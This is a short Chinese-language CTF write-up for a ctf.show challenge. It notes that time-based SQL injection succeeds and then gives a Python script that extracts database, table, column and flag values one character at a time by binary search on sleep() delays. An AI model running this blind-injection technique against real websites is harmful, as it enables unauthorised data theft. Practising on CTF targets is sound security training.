无论输入什么结果都一样,尝试延时注入
可以看到延时注入成功,接下来就用脚本跑了
import requests
if __name__ == '__main__':
url = 'http://ab9de79e-73ed-4344-976d-122e8c49ff6c.challenge.ctf.show/?id=1%27and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.2),0)%23'
#payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.2),0)%23'
#print(payload)
r = requests.get(url=url + payload)
try:
r = requests.get(url=url + payload, timeout=0.15)
high = mid
except:
low = mid + 1
if low != 32:
result += chr(low)
else:
break
print(result)
跑出结果